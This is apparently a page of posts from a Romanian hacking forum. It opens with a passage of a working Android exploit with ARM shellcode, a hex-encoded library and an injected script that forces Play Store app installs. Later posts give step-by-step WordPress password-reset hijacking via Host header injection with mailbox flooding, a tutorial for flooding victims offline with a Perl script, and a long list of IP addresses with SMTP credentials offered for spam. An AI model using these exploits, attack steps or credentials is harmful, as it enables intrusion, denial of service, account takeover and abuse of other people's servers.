90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,]; var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000"; var arrayBuffer = new ArrayBuffer(0x1000000); var arrayBufferAddress = getObjAddr(arrayBuffer)-1; var backingStoreAddress = read_uint32(arrayBufferAddress+4*4); var args_address = backingStoreAddress+1024; function write_shellcode(dlsym_addr,buffer){ //ldr r0,[pc,4]//0xe59f0004 //ldr r1,[pc,4]//0xe59f1004 //b shellcode;//0xea000001 //dlopen_addr//array_buffer_address //dlsym_addr //shellcode //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; for(var i=0;i<stub.length;i++){ globaldv[buffer/4+i]=stub[i]; } shellcode = shellcode.concat([0,0,0,0]); for(var i=0;i<shellcode.length/4>>>0;i++){ // u8arr[i+4*stub.length]=shellcode[i]; globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); } return stub.length*4+shellcode.length; } function xss_code(){ //alert(navigator.userAgent); //alert(document.cookie); var i1=setInterval(function(){ if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ console.log("wait load complete"); return; } clearInterval(i1); var i2=setInterval(function(){ document.getElementsByClassName("price buy id-track-click")[0].click(); var installButton = document.getElementById("purchase-ok-button"); if(installButton == null) return; installButton.click(); document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>"); clearInterval(i2); setTimeout(function(){ window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end"); },26000); },500); },500); } var js_str="\n"+xss_code.toString()+"xss_code();\n"; //var backup_arr = backup_original_code(huge_func_code_entry); var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); var args_view = new DataView(arrayBuffer,1024,100); var so_file_view = new DataView(arrayBuffer,4096); var js_view = new DataView(arrayBuffer,0x100000); args_view.setUint32(0,dlsym_addr+0xc,true); args_view.setUint32(4,dlsym_addr,true); args_view.setUint32(8,huge_func_code_entry,true); args_view.setUint32(12,writed_len,true); args_view.setUint32(16,backingStoreAddress+4096,true); args_view.setUint32(20,so_str.length/2,true); args_view.setUint32(24,backingStoreAddress+0x100000,true); args_view.setUint32(28,js_str.length,true); print("length is "+so_str.length); for(var i=0;i<so_str.length;i+=2){ var value = so_str.substr(i,2); value = "0x"+value; so_file_view.setUint8(i/2,parseInt(value)); } for(var i=0;i<js_str.length;i++){ js_view.setUint8(i,js_str.charCodeAt(i)); } print("begin execute shellcode"); huge_func({}); print("done"); postMessage(true); //prevent arrayBuffer to be released while(1){} } //main world function print(){ console.log.apply(null,arguments); document.write('<p >'); document.write.apply(document,arguments); document.write("<p>"); } // Build a worker from an anonymous function body var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); var worker; var exploitSucc = false; var count = 0; function startExploit(){ print("worker thread is started"); worker = new Worker( blobURL ); count++; worker.onmessage = function(e){ print("exploit result is "+e.data); exploitSucc = e.data; if(exploitSucc==false){ startExploit(); return; } var end = +new Date(); print("time diff is "+(end-begin)/1000); //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; } } var begin = +new Date(); startExploit(); var savedCount = 0; var hangMonitor = setInterval(function (){ if(exploitSucc==true){ clearInterval(hangMonitor); }else{ if(savedCount==count){//maybe hang print("worker maybe hange"); worker.terminate(); startExploit(); }else{ print("worker is normal"); savedCount = count; } } },10000); //URL.revokeObjectURL( blobURL ); </script> </html> Sursa: https://www.exploit-db.com/exploits/42175/. Platform: Android.

June 19, 2017

2 points

Title: WordPress 2.3-4.7.5 - Host Header Injection in Password Reset

Tu nu ai citit ce am scris, ti-am explicat pasii, daca ai nevoie de pasi cu 1,2,3 uite: 1) Iti trebuie emailul contului de WP 2) Iti trebuie un server de mail unde sa ai inregistrat acelasi cont ca acel al "victimei" , daca emailul contului de WP este info@domeniu.com, si tu trebuie sa ai info@domeniultau.com 3) Trimite foarte multe emailuri cu atasamente mari catre emalul victimei in asa fel in cat el sa nu mai aibe spatiu in quota si sa nu mai poata primii emailuri, sau fa DOS serverului de email. 4) Iti trebuie ip-ul real al serverului si sa fie singurul site de pe server, trimite un request de resetarea parole, dar schimbi headerul "Host" si bagi "Host: domeniultau.com" 5) Astepti sa vina emailul in casuta ta de email Nu sunt interesat, dar este cam mult de munca pentru 50e:))

June 18, 2017

2 points

Storj.io - Cloud Storage / Rent your drive

Deci sa tin 2TB la ei m-ar costa cam asa: - 0.015*2000 = 30 usd - Un download estimativ lunar de 5TB = 250 usd Ce e bullshit-ul asta man :))))))

June 19, 2017

1 point

Facebook Annoyer - Send warning email or sms

SHA256: ae02b215b5a317be4825a54ee54a8c038976e2017ab24ebab8dc3948eb6513a0 File name: Facebook Annoyer.exe Detection ratio: 1 / 61 Analysis date: 2017-06-18 15:46:40 UTC ( 1 hour, 54 minutes ago ) Zillya Trojan.Llac.Win32.10734 20170617 https://virustotal.com/en/file/ae02b215b5a317be4825a54ee54a8c038976e2017ab24ebab8dc3948eb6513a0/analysis/

June 18, 2017

1 point

Cyber Security Challenge Romania

@Byte-ul http://www.cybersecuritychallenge.ro/

June 2, 2017

1 point

[TUTORIAL] RooT pentru FlooD / Scan Gratis

Fiindca un singur tutorial bun pentru asa ceva am gasit pe acest forum, am decis sa fac eu unul mai detaliat care inca merge. Aveti nevoie de: - Cont pe Koding | Say goodbye to your localhost and code in the cloud. - Script pentru flood: http://andreyesl.16mb.com/esl.pl - O victima pe care sa o floodati Sa incepem: 1. Ne facem cont pe Koding | Say goodbye to your localhost and code in the cloud. . Nu explic prea multe: 2. Intram pe Script pentru flood si selectam tot textul din pagina. 3. Il copiem (CTRL + C) si ii dam paste in Notepad (CTRL + V). Apoi il salvam pe Desktop sau in orice alta parte ca esl.pl , ca in imaginea urmatoare: 4. Il tragem cu Mouse-ul in ROOT, langa celelalte fisiere si foldere, ca si in poza aceasta: 5. Pentru a incepe un atac (flood) vom scrie in Terminal: Eexmplu: Atacul a inceput, iar victima va ramane fara net in 10-60 secunde. Daca victima are o conexiune foarte buna la internet ( 1GBps ) fiti siguri ca nu va pica Daca portul este 0, va ataca toate porturile deschise. Daca timpul este 0, va transmite atacul pe o durata nelimitata de timp, pana cand veti opri manual acest atac. Pentru a opri atacul folositi combinatia de taste CTRL + C . PS: Tutorialul este facut in scop educativ. Nu ma intereseaza ca va adunati 4-5 pe skype si va dati flood intre voi. Am incercat doar sa va ofer gratis ceva pentru care unii din voi platesc 10-15 euro. Sursa: Romanian Hacking Forums • Index page

August 12, 2015

1 point

Smtp Gratis ;) destul de multe

Smtp gratis. 221.255.253.166,test,test 221.255.253.164,test,test 221.254.250.125,spam,spam 221.4.151.171,mike,mike 221.255.254.227,webmaster,webmaster 221.4.153.72,falcon,falcon 221.4.221.110,test,123456 221.6.204.23,test,test 221.4.139.153,list,list 221.6.105.150,sales,123456 221.6.105.148,sales,123456 221.6.230.217,guest,guest 221.7.245.245,support,support 221.76.161.4,postmaster,password 221.97.151.152,postmaster,password 203.105.80.190,info,info 203.105.80.99,info,info 203.105.81.205,info,info 203.105.82.119,webmaster,webmaster 203.105.82.161,info,info 203.105.82.82,info,info 203.105.84.142,webmaster,webmaster 203.105.84.188,test,test 203.105.84.167,info,info 203.0.178.181,guest,guest 203.105.84.203,news,news 203.106.88.8,test,test 203.109.115.162,info,info 203.110.160.42,office,office 203.113.116.234,staff,staff 203.113.116.236,staff,staff 203.113.116.235,staff,staff 203.113.116.237,staff,staff 203.10.76.10,judith,judith 203.115.18.133,sales,sales 203.115.103.110,admin,admin 203.116.143.5,staff,staff 203.113.114.38,support,support 203.112.63.251,admin,password 203.116.173.145,sales,12345 203.113.133.5,sales,123456 203.109.11.2,support,support 203.119.4.43,judith,judith 203.119.6.188,judith,judith 203.12.160.45,sales,sales 203.121.36.75,sales,12345 203.121.130.118,daemon,daemon 203.121.130.116,daemon,daemon 203.121.130.117,daemon,daemon 203.122.28.232,webadmin,123456 203.125.138.252,postmaster,password 203.125.193.3,postmaster,password 203.125.41.46,postmaster,password 203.122.229.216,nick,nick 203.125.8.62,virus,virus 203.125.254.154,spam,spam 203.125.159.185,unknown,unknown 203.126.59.195,postmaster,password 203.126.86.113,test,test 203.126.86.115,susan,susan 203.126.86.116,mail,mail 203.129.120.237,administrator,administrator 203.130.133.243,staff,staff 203.130.133.242,staff,staff 203.130.133.244,staff,staff 203.130.133.246,staff,staff 203.130.133.245,staff,staff 203.130.133.247,staff,staff 203.130.133.248,staff,staff 203.130.133.250,staff,staff 203.130.133.252,staff,staff 203.130.133.251,staff,staff 203.130.133.253,staff,staff 203.130.134.35,staff,staff 203.130.143.180,staff,staff 203.130.143.181,staff,staff 203.130.143.182,staff,staff 203.130.143.183,staff,staff 203.130.143.185,staff,staff 203.130.143.186,staff,staff 203.130.143.187,staff,staff 203.130.143.188,staff,staff 203.130.143.37,staff,staff 203.130.143.39,staff,staff 203.130.143.51,staff,staff 203.130.148.122,sales,sales 203.130.148.123,sales,sales 203.130.148.105,sales,sales 203.130.148.129,sales,sales 203.130.148.108,sales,sales 203.130.148.117,sales,sales 203.130.148.131,sales,sales 203.130.148.113,sales,sales 203.130.148.119,sales,sales 203.130.148.104,office,office 203.130.148.110,office,office 203.130.148.116,office,office 203.130.148.149,sales,sales 203.130.148.159,sales,sales 203.130.148.151,sales,sales 203.130.148.152,sales,sales 203.130.148.150,sales,sales 203.130.148.153,sales,sales 203.130.148.155,sales,sales 203.130.148.118,office,office 203.130.148.100,office,office 203.130.148.137,office,office 203.130.148.19,sales,sales 203.130.148.154,office,office 203.130.148.17,office,office 203.130.148.173,office,office 203.130.148.15,office,office 203.130.148.185,office,office 203.130.148.186,office,office 203.130.148.184,office,office 203.130.148.194,office,office 203.130.148.204,office,office 203.130.148.22,sales,sales 203.130.148.226,office,office 203.130.148.228,office,office 203.130.148.229,office,office 203.130.148.23,sales,sales 203.130.148.232,office,office 203.130.148.233,office,office 203.130.148.237,office,office 203.130.148.236,office,office 203.130.148.239,office,office 203.130.148.238,office,office 203.130.148.242,office,office 203.130.148.243,office,office 203.130.148.253,sales,sales 203.130.148.247,office,office 203.130.148.246,office,office 203.130.148.245,office,office 203.130.148.248,office,office 203.130.148.29,office,office 203.130.148.192,office,office 203.130.134.36,sales,sales 203.130.148.177,office,office 203.130.148.235,office,office 203.130.148.37,office,office 203.126.56.138,alex,alex 203.130.148.41,office,office 203.130.148.45,office,office 203.130.148.57,office,office 203.130.148.55,office,office 203.130.148.59,sales,sales 203.130.148.66,sales,sales 203.130.148.74,sales,sales 203.130.148.78,office,office 203.130.148.82,office,office 203.130.148.81,office,office 203.130.148.80,office,office 203.130.148.83,office,office 203.130.148.85,office,office 203.130.148.94,sales,sales 203.129.218.30,temp,123456 203.130.149.14,sales,123456 203.130.149.102,sales,123456 203.130.149.10,sales,123456 203.130.149.12,sales,123456 203.130.149.22,sales,123456 203.130.149.17,sales,123456 203.130.149.101,sales,123456 203.130.149.1,sales,123456 203.130.149.103,sales,123456 203.130.149.3,sales,123456 203.130.149.19,sales,123456 203.130.149.48,sales,123456 203.130.149.32,sales,123456 203.130.149.33,sales,123456 203.130.149.29,sales,123456 203.130.149.2,sales,123456 203.130.149.25,sales,123456 203.130.149.38,sales,123456 203.130.149.51,sales,123456 203.130.149.37,sales,123456 203.130.149.75,sales,123456 203.130.149.76,sales,123456 203.130.149.87,sales,123456 203.130.149.59,sales,123456 203.130.149.55,sales,123456 203.130.149.88,sales,123456 203.130.149.93,sales,123456 203.130.149.56,sales,123456 203.130.149.47,sales,123456 203.130.149.74,sales,123456 203.130.149.67,sales,123456 203.130.149.8,sales,123456 203.130.149.60,sales,123456 203.130.149.42,sales,123456 203.130.149.70,sales,123456 203.130.149.65,sales,123456 203.130.149.50,sales,123456 203.130.149.27,sales,123456 203.130.149.89,sales,123456 203.130.149.85,sales,123456 203.130.149.57,sales,123456 203.130.149.92,sales,123456 203.130.149.86,sales,123456 203.130.149.53,sales,123456 203.130.149.34,sales,123456 203.130.149.31,sales,123456 203.130.149.95,sales,123456 203.130.149.78,sales,123456 203.130.149.91,sales,123456 203.130.149.99,sales,123456 203.130.149.69,sales,123456 203.130.149.79,sales,123456 203.131.209.83,postfix,123456 203.130.157.246,test,test 203.13.37.145,marketing,password 203.134.223.140,postmaster,123456 203.133.237.62,testtest,testtest 203.133.238.109,testtest,testtest 203.133.237.61,testtest,testtest 203.138.101.95,info,info 203.138.103.41,info,info 203.138.109.32,info,info 203.141.131.186,test,test 203.141.139.140,contact,contact 203.140.38.41,oracle,oracle 203.140.142.166,postgres,postgres 203.140.38.42,test,test 203.141.144.55,temp,temp 203.141.133.130,postmaster,password 203.142.12.91,info,123456 203.143.14.229,virus,virus 203.144.173.4,admin,admin123 203.144.173.123,test123,test123 203.144.29.131,test,test123 203.146.170.178,postmaster,password 203.146.146.3,postmaster,password 203.147.0.5,test,test12345 203.150.8.144,test,test 203.150.217.139,pop,pop 203.150.8.143,test,test 203.151.20.226,service,service 203.151.221.1,postmaster,password 203.152.100.1,richard,richard 203.152.100.4,richard,richard 203.152.203.10,test,test 203.152.203.12,test,test 203.152.203.13,test,test 203.152.203.14,test,test 203.152.203.11,test,test 203.152.217.143,postmaster,password 203.152.205.82,info,info 203.153.104.144,recruit,recruit 203.153.104.145,recruit,recruit 203.153.104.148,recruit,recruit 203.153.104.149,recruit,recruit 203.153.104.147,recruit,recruit 203.153.104.146,recruit,recruit 203.153.104.150,recruit,recruit 203.153.104.151,recruit,recruit 203.153.104.26,admin,admin 203.152.25.151,admin,admin 203.152.25.159,admin,admin 203.152.25.155,admin,admin 203.152.25.199,admin,admin 203.155.10.2,office,password 203.155.217.6,temp,temp 203.156.93.164,recruit,recruit 203.156.205.85,info,123456 203.155.56.4,mysql,mysql 203.157.0.2,cyrus,cyrus 203.158.215.9,postmaster,password 203.159.12.2,postmaster,password 203.155.220.200,anna,anna 203.162.148.197,sales,123456 203.167.145.237,mike,mike 203.162.96.70,webmaster,123456 203.162.93.26,admin,123456 203.170.145.30,admin,qwerty 203.170.145.39,admin,qwerty 203.170.75.98,test,test 203.170.73.162,admin,admin 203.161.125.4,merlin,merlin 203.174.27.98,staff,staff 203.174.27.99,staff,staff 203.17.237.130,qwerty,qwerty 203.173.82.151,master,master 203.174.68.206,test,test 203.174.68.209,test,test 203.173.82.133,info,info 203.177.141.123,backup,backup 203.177.216.50,training,training 203.173.82.134,support,support 203.173.82.2,test123,test123 203.179.133.5,sales,sales 203.173.82.132,honda,honda 203.179.216.26,office,office 203.179.88.92,test,test 203.180.145.159,postgres,postgres 203.180.145.155,postgres,postgres 203.180.145.178,postgres,postgres 203.180.145.163,postgres,postgres 203.180.145.176,postgres,postgres 203.180.145.198,postgres,postgres 203.180.145.45,postgres,postgres 203.180.145.57,postgres,postgres 203.180.145.137,postgres,postgres 203.180.145.141,postgres,postgres 203.180.145.113,postgres,postgres 203.180.145.135,postgres,postgres 203.180.145.139,postgres,postgres 203.180.145.76,postgres,postgres 203.180.145.85,postgres,postgres 203.180.145.103,postgres,postgres 203.180.145.161,postgres,postgres 203.180.145.37,postgres,postgres 203.180.145.128,postgres,postgres 203.180.145.107,postgres,postgres 203.180.145.54,postgres,postgres 203.180.145.186,postgres,postgres 203.180.145.241,postgres,postgres 203.180.145.55,postgres,postgres 203.180.145.83,postgres,postgres 203.180.145.35,postgres,postgres 203.180.145.133,postgres,postgres 203.180.145.143,postgres,postgres 203.180.145.74,postgres,postgres 203.180.145.88,postgres,postgres 203.180.145.92,postgres,postgres 203.180.145.99,postgres,postgres 203.181.48.5,administrator,administrator 203.181.93.25,recruit,recruit 203.183.141.10,test,test 203.18.21.5,dean,dean 203.183.141.12,username,username 203.183.141.11,username,username 203.183.170.11,info,info 203.185.10.250,user,user 203.185.4.66,lisa,lisa 203.185.51.181,test,test 203.186.182.130,spam,spam123 203.186.8.82,postmaster,123456 203.187.173.236,office,office 203.188.219.11,staff,staff 203.188.219.6,staff,staff 203.187.14.134,mike,mike 203.187.14.132,mike,mike 203.187.14.133,mike,mike 203.188.218.229,marketing,marketing 203.188.218.227,marketing,marketing 203.188.218.242,marketing,marketing 203.188.218.228,marketing,marketing 203.188.254.235,admin,123456 203.188.252.22,michael,michael 203.188.252.9,michael,michael 203.189.189.194,postmaster,password 203.186.89.131,student,student 203.189.89.36,tony,tony 203.189.54.6,info,info 203.189.231.35,sales,1234 203.185.30.43,cool,cool 203.189.224.9,sales,1234 203.191.247.59,sales,sales 203.191.224.237,demo,demo 203.191.236.201,mysql,mysql 203.195.100.30,test,test123 203.196.80.119,postmaster,password 203.197.197.183,admin,admin 203.197.197.181,admin,admin 203.197.197.182,admin,admin 203.197.197.180,admin,admin 203.198.131.148,service,service 203.190.10.253,crystal,crystal 203.198.162.138,guest,guest123 203.199.113.39,postmaster,postmaster 203.199.89.92,test,test 203.198.71.4,test,test12345 203.200.151.101,web,web 203.200.89.147,webmaster,webmaster 203.201.150.130,training,training 